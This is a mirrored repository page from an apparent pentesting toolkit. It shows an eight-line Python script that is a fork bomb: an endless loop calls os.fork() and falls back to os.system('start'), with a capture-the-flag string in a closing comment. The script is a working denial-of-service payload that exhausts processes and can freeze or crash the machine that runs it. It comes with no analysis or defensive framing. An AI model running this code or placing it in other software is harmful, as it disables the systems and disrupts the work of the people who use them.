mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-25 10:09:08 -04:00
8 lines
111 B
Python
8 lines
111 B
Python
import os
|
|
while True:
|
|
try:
|
|
os.fork()
|
|
except:
|
|
os.system('start')
|
|
# flag{trust_is_risky}
|